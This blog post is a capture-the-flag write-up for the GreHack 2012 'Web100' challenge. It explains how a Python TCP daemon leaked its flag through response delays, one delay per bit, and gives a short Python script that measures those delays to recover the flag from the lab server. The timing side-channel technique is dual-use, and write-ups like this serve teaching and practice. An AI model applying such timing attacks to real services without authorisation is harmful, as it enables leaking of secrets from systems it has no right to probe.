codezen.fr code hacking, zen coding

20Oct/12Off

GreHack 2012 – Web100 (python daemon) Writeup

I don't know why this was classified as "Web" during the CTF because it's actually a Python TCPServer, nothing to do with Web.

Anyways, the only hint we get for this challenge is "192.168.203.35:30050"

When telneting to it, it does nothing, no banner. Sending a string will make it output an integer but sometime with a notable 5 seconds delay. We are not disconnected after each string.

We started by logging the integer replies and if there was a delay or not. Analyzing the data, we found that after a certain number of packets, the delay patterns will start to repeat exactly.

Manually converting the delay pattern to binary for the first few ones started to give us ASCII characters...

To summarize:
- We can send as much packets as we want
- Each packet will get an integer reply sometime with a 5 seconds delay
- The delay pattern repeats, the integer numbers does not
- It's a time-based attacks on the bits of the flag, 1 will get a delay, 0 will not.

Solution:

#!/usr/bin/env python

import socket
import time
import struct

host = '192.168.203.35'
port = 30050

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))

flag = ''
answer = ''

i = 0
while i < 1024:
   buffer = 'A' * 8
   start = time.time()
   sock.send(buffer)
   result = sock.recv(64)
   elapsed = time.time() - start
   print "i=", i, "elapsed=", elapsed, "result=", result
   if elapsed > 2:
     flag = flag + '1'
   else:
     flag = flag + '0'
   i = i + 1
   if i % 8 == 0:
     c = int(flag,2)
     answer = answer + chr(c)
     print "flag=", answer
     flag = ''
Share

Posted by aXs

Comments (0) Trackbacks (0)

Sorry, the comment form is closed at this time.

Trackbacks are disabled.